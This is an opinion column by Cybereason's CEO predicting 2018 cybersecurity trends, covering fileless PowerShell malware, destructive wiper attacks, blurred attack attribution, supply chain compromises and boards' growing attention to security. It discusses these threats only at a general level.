• United States




More cybersecurity drama, but some hope for defenders in 2018

Dec 21, 20176 mins
Data BreachHackingMalware

And this for the short descriptive sentence: From fileless malware attacks to attack attribution becoming more complex, 2018 won't offer less security drama. But there's still good reason for security professionals to be optimistic about next year.

Cybersecurity dominated the news cycle in 2017. Every few weeks there were headlines about ransomware, leaks of spy tools from U.S. intelligence agencies and breaches at major companies.

While no one expects 2018 to offer less security drama, there’s good reason for security professionals to be optimistic about the months ahead. Here’s my take on what the year ahead holds for the security community based on my conversations with security executives and analysts.

Fileless malware attacks become ubiquitous

Fileless malware is malicious code that exists in memory and not on the target’s hard drive. The code is injected into a running process, such as explorer.exe, and then used for the exploit. Instead of using malware to deliver a malicious payload, adversaries use PowerShell, Windows Management Instrumentation and other administration tools built into Windows.

Attackers are interested in fileless malware attacks since they leverage tools that are native to Windows, making them effective and stealthy, since most security programs can’t detect malicious use of PowerShell and WMI. And since there’s no malware signature for antivirus software to detect (remember, there’s no payload file to infect a system), those programs are ineffective at flagging these attacks.

Adversaries are also turning to fileless malware attacks since there are numerous readily-available tools and ready-to-use scripts that make creating PowerShell payloads particularly easy (think Empire, Metasploit, Cobalt Strike and PowerSploit). To be clear, these tools aren’t malicious by nature. Adversaries are abusing them to quickly create PowerShell payloads and evade detection.

Destructive attacks don’t let up

Destructive attacks (those that wipe out data on computers instead of holding it for ransom) will only get worse. The trend since 2010 has been an increase in attacks that were carried out using relatively simple but capable, destructive malware.

June’s NotPetya attack exemplifies this type of attack. While initial reports classified NotPetya as ransomware, it was later determined that the program’s behavior more closely matched a master boot record wiper, which is a very basic technique. But this very basic attack had a devastating effect that went beyond re-imaging machines and restoring data from backups: companies closed manufacturing plants for weeks, lost quarterly revenue and couldn’t conduct normal business operations.

As more actors become emboldened by the lack of consequences for conducting cyberattacks, we are going to see an increase in destructive attacks next year. Most of them will show a level sophistication that’s good enough to get the job done, and rely on basic tools to cause severe damage. Ultimately, cheap, dirty and effective methods are all any actor needs, a realization that many are having. Disruption is an especially appealing tactic for nation-states and less sophisticated attackers who care less about profit and more about conveying a message or covering a hacking operation’s forensic evidence.

Attribution lines blur

Advanced, targeted attacks have traditionally been associated with nation-state players, earning the countries behind these campaigns the moniker APT actors. But in the last few years, the lines have blurred between the attack capabilities of nation-state players and those of the lower-level cybercriminals groups. Techniques and tools that were once used by a few APT actors have been adopted by dozens of other threat actors, including freelance groups hired by government agencies and organized criminals.

The commoditization of advanced toolsets (think The Shadow Brokers and Vault 8 leaks, which included the source code for high-end tools allegedly developed by the NSA and the CIA) and the public disclosure of attack techniques (like those released during the Vault 7 leaks) is the reason behind this development. Smaller actors now have access to the same assets as the big players. When both nation-state actors and more common actors are using the same tools, the security community’s ability to attribute attacks to real-world organizations or military units will be severely hindered in 2018.

Supply chain attacks are the new normal

Several supply chain attacks made headlines in 2017, with CCleaner and M.E.Doc being two that generated a lot of attention. Reports of these attacks are likely to increase in 2018 as new players enter the hacking game and gain capabilities that were once exclusive to APT players.

A supply chain attack aims to damage an organization by targeting less secure elements in the supply network. Exploiting a service provider’s supply chain, data supply chain or traditional manufacturer supply chain has been seen in a litany of major data breaches in recent years. In all of these attacks, the victim is not the ultimate target of the attack, but rather a stepping stone to other networks.

Supply chain attacks are increasing because of their economies of scale. The massive data breaches of late have flooded the underground markets with personal identifiable information, credit card numbers and bank account details. The supply of data now exceeds the demand, bringing down the value of this information. Attack campaigns are operated like a business and like any business that hopes to stay afloat, each campaign has to yield a profit and have low operational costs and a high ROI.

Supply chain attacks enable hacking at scale: the attackers build a hacking operation that targets one organization, and through it are able to gain an initial foothold and further compromise hundreds and sometimes thousands of organizations. When combined with other automated mechanisms, these operations can be scaled up, which allows many organizations to be compromised at the same time. This powerful shift helps drive the economics in favor of the attacker. Plus, supply chain attacks are the gift that continues to give: as long as they are not revealed, they provide ongoing access to new targets without investing in a new toolset.

2018: the year of the defender

But I don’t want this column to be all doom and gloom. The upshot to cybersecurity dominating the 2017 news cycle is that boards of directors and executives are finally aware that security matters. This means that security leaders may finally have a spot in the C-suite, which could lead to 2018 being the year of the defender…stay tuned.


Lior Div is the CEO and Co-Founder of Cybereason. Before forming Cybereason, he founded cyber-security company Alfa Tech.

Div also served in the Israeli Defense Forces. While in the IDF, Div was part of the Israeli Intelligence Corps, where he lead an elite cyber-security team in the Corps' 8200 unit. Div's work in the Corps earned him a Medal of Honor.

He is an expert hacking operations, forensics, reverse engineering, malware analysis, cryptography and evasion.

The opinions expressed in this blog are those of Lior Div and do not necessarily represent those of IDG Communications, Inc., its parent, subsidiary or affiliated companies.